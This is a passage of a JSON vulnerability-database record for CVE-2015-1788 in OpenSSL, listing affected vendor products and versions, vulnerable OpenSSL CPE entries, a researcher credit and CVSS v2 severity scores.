        "model": "flashsystem 9846-ac1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v840"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50006.2"
      },
      {
        "model": "db2\u00ae connect? application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "fsso build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "235"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "db2 connect unlimited edition for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "junos 12.1x44-d26",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "worklight foundation enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "hp-ux b.11.11.14.15",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.11"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "fortiap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0"
      },
      {
        "model": "junos 12.1x44-d35.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.8.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.5"
      },
      {
        "model": "sametime unified telephony",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.2"
      },
      {
        "model": "cloud orchestrator enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4.0.1"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "db2\u00ae workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system networking rackswitch g8332",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.20.0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35006.3"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.1.0.7"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.12"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "fortiadc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.2"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.5.0.3"
      },
      {
        "model": "secure backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1"
      },
      {
        "model": "db2\u00ae connect? enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37006.3"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.5"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "db2\u00ae advanced enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "junos 12.1x47-d25",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.12"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.7"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.12"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4"
      },
      {
        "model": "security network controller 1.0.3376m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.9"
      },
      {
        "model": "gpfs storage server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.6"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "transportation management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.15"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3379"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "netscaler service delivery appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "junos 13.2x51-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.16"
      },
      {
        "model": "matrix operating environment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "predictiveinsight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.0.0"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.2.7"
      },
      {
        "model": "junos 12.1x46-d36",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 13.2x51-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "db2 workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.8"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "san volume controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.12"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "hp-ux b.11.11.15.13",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "san volume controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.3"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "db2 connect? application server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.1.0.7"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.5.0.3"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.7"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.5.0.2"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.8"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "db2 enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.4"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "db2 connect application server advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.5"
      },
      {
        "model": "junos 15.1x49-d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 14.2r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "fortiauthenticator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.1"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.10"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "db2\u00ae advanced workgroup server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "personal communications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.3"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.1.0.6"
      },
      {
        "model": "san volume controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.1"
      },
      {
        "model": "abyp-2t-0s-2l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.1"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.4.0.6"
      },
      {
        "model": "system networking rackswitch g8264",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.14.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.32"
      },
      {
        "model": "cloud orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "junos 12.1x46-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "junos 12.1x47-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x44-d32",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 13.2x51-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.2.0.8"
      },
      {
        "model": "project openssl 1.0.1l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v37007.5"
      },
      {
        "model": "db2\u00ae enterprise server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "storwize",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v35007.5.0.3"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.12"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v50007.3.0.5"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "rational team concert",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "systems insight manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70007.2.0.8"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "db2 connect unlimited advanced edition for system z",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "spectrum scale",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1.1"
      },
      {
        "model": "junos 12.3r10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.214"
      },
      {
        "model": "websphere mq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "15.04"
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "junos 12.1x44-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "75158"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "0.9.8zf",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Joseph Birr-Pixton",
    "sources": [
      {
        "db": "BID",
        "id": "75158"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-1788",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-1788",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-1788",
            "trust": 1.8,
            "value": "MEDIUM"
          },
